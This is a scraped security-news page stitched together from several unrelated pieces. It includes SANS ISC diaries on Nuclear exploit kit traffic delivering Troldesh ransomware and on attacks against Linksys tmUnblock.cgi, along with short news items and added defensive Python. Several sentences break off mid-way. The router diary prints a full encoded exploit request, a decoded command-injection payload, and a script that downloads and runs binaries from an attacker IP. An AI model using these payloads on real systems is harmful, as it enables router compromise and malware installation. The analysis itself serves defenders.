Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Introduction

About two weeks ago, Nuclear exploit kit (EK) changed its URL patterns. Now it looks a bit like Angler EK. Kafeine originally announced the change on 2015-07-21 [1], and we collected examples the next day.

Here's how Nuclear EK looked on

Now that we're into August 2015, URL patterns for Nuclear EK have altered again. These changes are similar to what we've seen with Angler EK since June 2015 [3]. They're not the same URL patterns as Angler, but the changes are similar.

In today's diary, we examine Nuclear EK traffic as of Tuesday, 2015-08-04. In this example, the EK delivered Troldesh ransomware, which is similar to a previous infection I published earlier this year in April 2015 [4].

First, let's see how the 2015-08-04 traffic from a compromised website led to Nuclear EK.

From a compromised web site to the EK

I viewed the compromised website by getting to it through a Bing search, which is my preferred method for generating EK traffic. Google had already identified the site as potentially malicious and wouldn't

Malicious JavaScript was injected in at least 4 places when I visited the site's index page. The script is obfuscated, so you won't see any obvious URLs.

What's the easiest way to deobfuscate the script? Copy and paste the script into its own HTML file, make sure you

Open the resulting web page in a browser, and you should see an alert showing the deobfuscated script. From the above example, we find a hidden iframe that goes to mobi-avto.ru.

With any EK, this all happens behind the scenes. The average user won't know what happened until it's too late. With ransomware, users will realize something
Shown above: The infected host's desktop after the Troldesh ransomware infection.

A look at the Nuclear EK traffic

On 2015-07-21, when Nuclear changed, each GET request from the EK started with search?q=. URL patterns remained that way through at least 2015-07-30 [5]. A few days later, the landing page URL still contains search?q=. However, other URLs for the Flash exploit and payload use different words. They also follow a different pattern after the question mark (?) up to the equal sign (=). Below shows our example of

In the 2015-08-04 traffic, Nuclear EK's landing page has some text before the initial HTML tag. This is something we hadn't

Except for the change in the URL pattern, this HTTP GET request for the EK's Flash exploit is similar to what we

Nuclear EK still uses an ASCII string to XOR the payload binary. This started with Nuclear's previous change of URL patterns back in December 2014 [6], and it remains the EK
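As an added example (not code from the diary or from the exploit kit), the Python below shows how an analyst can recover a repeating ASCII XOR key from a captured payload without guessing it, using the bytes every Windows PE shares at fixed offsets; the sample payload and the key are constructed, and the only real values assumed are the standard 'MZ' magic and DOS-stub string.

```python
"""Recover the repeating ASCII XOR key of an EK payload from its PE header.

Added example, not code from the diary. Nuclear EK XORs the payload with an
ASCII string; a Windows PE gives the analyst known plaintext at fixed offsets
('MZ' at 0, the DOS-stub message at 0x4e), so the key can be derived from the
captured bytes instead of guessed. The sample payload and key are constructed.
"""
from typing import Optional

DOS_STUB = b"This program cannot be run in DOS mode."  # 39 bytes, in every standard PE
DOS_STUB_OFFSET = 0x4E

def xor_repeating(data: bytes, key: bytes, start: int = 0) -> bytes:
    """XOR data with the key repeated; start is data's offset within the file."""
    return bytes(b ^ key[(start + i) % len(key)] for i, b in enumerate(data))

def key_for_length(blob: bytes, key_len: int) -> Optional[bytes]:
    """Derive a key_len-byte key from the DOS-stub known plaintext (key_len <= 39,
    so the stub covers every key position). Keep it only if it decodes the whole
    stub consistently, decodes the 'MZ' magic at offset 0, and is printable ASCII."""
    end = DOS_STUB_OFFSET + len(DOS_STUB)
    if key_len > len(DOS_STUB) or len(blob) < end:
        return None
    key = bytearray(key_len)
    for i, plain in enumerate(DOS_STUB):
        pos = DOS_STUB_OFFSET + i
        key[pos % key_len] = blob[pos] ^ plain      # later writes overwrite; the
    key = bytes(key)                                # stub re-check catches conflicts
    stub_ok = xor_repeating(blob[DOS_STUB_OFFSET:end], key, DOS_STUB_OFFSET) == DOS_STUB
    magic_ok = xor_repeating(blob[:2], key) == b"MZ"
    ascii_ok = all(0x20 <= c < 0x7F for c in key)
    return key if stub_ok and magic_ok and ascii_ok else None

def recover_key(blob: bytes) -> Optional[bytes]:
    """Return the shortest key that passes all checks, or None."""
    for key_len in range(1, len(DOS_STUB) + 1):
        key = key_for_length(blob, key_len)
        if key is not None:
            return key
    return None

# Constructed stand-in for a captured payload: PE-like header bytes only.
SAMPLE_PE = b"MZ" + b"\x90" * (DOS_STUB_OFFSET - 2) + DOS_STUB + b"\x00" * 16 + b"PE\x00\x00"
SAMPLE_KEY = b"constructed-key-2015"  # constructed 20-byte key, not one seen in the wild
SAMPLE_BLOB = xor_repeating(SAMPLE_PE, SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB)
    print("recovered key:", key)
    print("decoded header:", xor_repeating(SAMPLE_BLOB, key)[:2])
```

Keys longer than the 39-byte stub string are not fully covered by this known plaintext; for those, extend the plaintext with other fixed PE header bytes before the same consistency checks.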

Review the infection traffic using Security Onion with the Emerging Threats signature set, and you'll find

Additional information from the infected host

Filtering the traffic in Wireshark, we see SSL activity to 216.230.230.247 over port 443 and 193.111.140.118 over port 995. Although this traffic is related to the Troldesh ransomware, those IP addresses are not inherently malicious.

The README text files from the desktop were identical.

Hey, Google. Someone is using Gmail accounts for nefarious purposes. Bet you haven't seen that before! Ah, free services... A cyber-criminal's delight!

Final words

In recent months, we've seen a lot of ransomware from EK traffic. This has been primarily (but not limited to) Angler, Magnitude, and Nuclear EK. Most of the ransomware has been CryptoWall 3.0 [7], but every once in a while, we'll see something like AlpaCrypt/TeslaCrypt [8] or Troldesh [4]. We'll continue to monitor EK traffic and post any significant changes.

A pcap of the 2015-08-04 Nuclear EK infection traffic is available at:

A zip file of the associated malware is available at:

The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.

---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://www.malware-traffic-analysis.net/2015/07/22/index.html
[2] http://www.malware-traffic-analysis.net/2015/07/20/index.html
[3] https://threatpost.com/evasion-techniques-keep-angler-eks-cryptowall-business-thriving/113596
[4] http://www.malware-traffic-analysis.net/2015/04/09/index.html
[5] http://www.malware-traffic-analysis.net/2015/07/30/index.html
[6] https://isc.sans.edu/diary/Exploit+Kit+Evolution+During+2014+-+Nuclear+Pack/19081
[7] https://isc.sans.edu/diary/Another+example+of+Angler+exploit+kit+pushing+CryptoWall+30/19863
[8] https://isc.sans.edu/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681

 

Andy Weir is the creator of Mark Watney, a fictional astronaut who can solve any problem the harsh environment of Mars throws his way.

But Weir, author of The Martian, ran into a tricky problem on Earth this week when his e-mail and Twitter accounts were hacked. The culprit, he says, was a hacker who reset the password for his Comcast.net e-mail account by calling Comcast and pretending to be him. Comcast let the hacker take control of his e-mail account after asking "security questions" for which the answers were easy to find, according to Weir.

"Well I got hacked," Weir wrote on Facebook last night. "Someone compromised my e-mail account and twitter account. I don't know how they got the password. My guess is they socially engineered a password reset on my e-mail account, and they used that to do a password reset on Twitter. They also set up an e-mail forward to an account they control, so even after I changed my e-mail password they were still getting my e-mails until I found that. Whee."


 
[SECURITY] [DSA 3328-2] wordpress regression update
 

In March, researchers revealed one of the more impressive if slightly esoteric hacks in recent memory—an attack that exploited physical weaknesses in computer memory chips to hijack the operating system running on them. Now a separate research team has unveiled techniques that make the attack more practical by allowing hacked or malicious websites to carry it out against unsuspecting visitors.

The "bitflipping" attack exploits physical flaws in certain DDR3 chip modules. By repeatedly accessing specific memory locations millions of times per second, attackers can cause zeroes to change to ones and vice versa in nearby memory locations. These bitflips can make it possible for an untrusted application to gain nearly unfettered system privileges or to bypass security sandboxes designed to keep malicious code from accessing sensitive operating system resources. Early versions of the attack worked only by running special code that wasn't practical in website environments, making the weakness hard to exploit in large, drive-by-style campaigns.

Last week, researchers published a bitflipping method that relies on JavaScript code used by standard browsers. Rowhammer.js, as the new proof-of-concept attack has been dubbed, is slow, and so far it only works on a Lenovo x230 Ivy Bridge Laptop running default settings and on a Haswell CPU if its refresh interval is increased as gamers sometimes do to increase system performance. And even then, the researchers were unable to use the attack to gain root access. Despite the limitations, however, the modified attack does what has never been done before—achieving a bitflipping attack using nothing more than the JavaScript allowed by every modern browser.


 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Security fix BZ1205130 - patch for CTCP Denial of Service. New upstream release of Quassel IRC Client
 
LinuxSecurity.com: Security Report Summary
 
Mozilla extensions: a security nightmare
 
[SECURITY] [DSA 3328-1] wordpress security update
 
[SECURITY] [DSA 3327-1] squid3 security update
 

Last year, we wrote about the Moon Worm, a bitcoin mining piece of malware that infected Linksys routers. Ever since then, I have seen lots and lots of hits to the vulnerable cgi script (tmUnblock.cgi).

27.100.64.102 - - [04/Aug/2015:10:03:44 +0000] GET /tmUnblock.cgi HTTP/1.1 200 195 - -
27.100.64.102 - - [04/Aug/2015:10:03:45 +0000] POST /tmUnblock.cgi HTTP/1.1 200 195 - -

POST /tmUnblock.cgi HTTP/1.1
Host: [server ip address]:8080
Accept-Encoding: identity
Content-Length: 850

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e %3d%61%63%74%69%6f%6e%3d%63%6f%6d%6d%69%74%3d%74%74%63%70%5f%6e%75%6d%3d%32%74 %74%63%70%5f%73%69%7a%65%3d%32%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74 %6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%69%72%6b%31%2e %73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%69%72%6b%32%2e%73%68%20%68%74 %74%70%3a%2f%2f%31%30%39%2e%32%30%36%2e%31%37%37%2e%31%36%2f%66%65%72%72%79%2f%72 %65%76%31%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68%3b%65%63%68%6f%20%22%63 %68%6d%6f%64%20%2b%78%20%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73%68 %3b%65%63%68%6f%20%22%2e%2f%69%72%6b%32%2e%73%68%22%20%3e%3e%20%69%72%6b%31%2e%73 %68%3b%63%68%6d%6f%64%20%2b%78%20%69%72%6b%31%2e%73%68%3b%2e%2f%69%72%6b%31%2e%73 %68%60

Decoded, the body reads:

submit_button=change_action=action=commit=ttcp_num=2ttcp_size=2echo #!/bin/sh echo wget -O irk2.sh hxxp://109.206.177.16/ferry/rev12.sh echo chmod +x irk2.sh echo ./irk2.sh ./irk1.sh`StartEPI=1
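As an added example that is not from the diary, the Python below percent-decodes a tmUnblock.cgi form body of the kind shown above and flags values that carry shell constructs or, for the ttcp_ip field, do not look like the IPv4 address the form expects; the sample body and the c2.invalid host are constructed placeholders, not the diary's request.

```python
"""Decode a percent-encoded tmUnblock.cgi POST body and flag command injection.

Added example, not code from the diary. The exploit body in the diary is fully
percent-encoded, so the shell commands never appear literally in the capture;
decoding each form value and checking it against what the field should hold
(ttcp_ip is an IPv4 address) surfaces the injection. The sample body below is
constructed, with the remote host replaced by the placeholder c2.invalid.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_to_bytes

IPV4 = re.compile(rb"^\d{1,3}(\.\d{1,3}){3}$")
# Heuristic: shell constructs that never belong in a router form value.
SHELL_MARKERS = re.compile(rb"`|\$\(|;|\|\||&&|\b(wget|curl|tftp|chmod)\b")

def decode_body(body: bytes) -> List[Tuple[bytes, bytes]]:
    """Split on '&' and '=' first, then percent-decode each part, so an encoded
    separator (%26, %3d) inside a value cannot create or merge fields."""
    pairs = []
    for field in body.split(b"&"):
        name, _, value = field.partition(b"=")
        pairs.append((unquote_to_bytes(name), unquote_to_bytes(value)))
    return pairs

def suspicious_fields(body: bytes) -> Dict[str, str]:
    """Return {field: decoded value} for every value that fails validation."""
    hits = {}
    for name, value in decode_body(body):
        bad = SHELL_MARKERS.search(value) is not None
        if name == b"ttcp_ip" and not IPV4.match(value):  # allow-list for the known field
            bad = True
        if bad:
            hits[name.decode("latin-1")] = value.decode("latin-1")
    return hits

# Constructed sample: same field layout as the diary's request, with the field
# name and the injected value percent-encoded and the host made a placeholder.
SAMPLE_BODY = (
    b"submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2"
    b"&%74%74%63%70%5f%69%70=%2d%68%20%60%63%64%20%2f%74%6d%70%3b%77%67%65%74"
    b"%20%2d%4f%20%78%2e%73%68%20%68%74%74%70%3a%2f%2f%63%32%2e%69%6e%76%61%6c"
    b"%69%64%2f%78%2e%73%68%60&StartEPI=1"
)
# Constructed benign request for comparison (192.0.2.10 is a documentation address).
BENIGN_BODY = b"submit_button=&ttcp_num=2&ttcp_size=2&ttcp_ip=192.0.2.10&StartEPI=1"

if __name__ == "__main__":
    for name, value in suspicious_fields(SAMPLE_BODY).items():
        print(f"suspicious field {name!r}: {value!r}")
```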

Unlike for the Moon worm, the additional malware is not pulled from the host sending the exploit. The irk2.sh / rev12.sh

#!/bin/sh
cd /tmp
wget -O .nttpd hxxp://109.206.177.16/ferry/.nttpd,14-le-t1
chmod +x .nttpd
./.nttpd
sleep 2
wget -O .sox http://109.206.177.16/ferry/.sox,14-le-t1
chmod +x .sox
./.sox

The script downloads and runs two additional executables. I haven't done the full analysis yet (let me know if you want a copy and can

INPUT -p udp --dport 9999 -j DROP
INPUT -p tcp -m multiport --dport 80,8080 -j DROP
INPUT -s 109.206.177.16 -j ACCEPT
INPUT -s 50.77.24.41 -j ACCEPT
INPUT -s 109.206.186.250 -j ACCEPT
INPUT -s 91.217.90.49 -j ACCEPT
INPUT -s 91.217.90.19 -j ACCEPT

So it looks like the attacker is securing the router by blocking access to the web-based admin interface (ports 80 and 8080) and allowing access only from very specific IP addresses, probably controlled by the attacker.

VirusTotal identifies .nttpd and .sox as a proxy (Avast, DrWeb). Reports for these binaries go back a few months.

The scripts also appear to modify name servers in resolv.conf, but so far I think they only set them to Google's name servers (8.8.8.8 and 8.8.4.4).

FWIW: per whois, 109.206.177.16 belongs to Serverel, a California company (but it is RIPE IP address space). [email protected] was notified.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 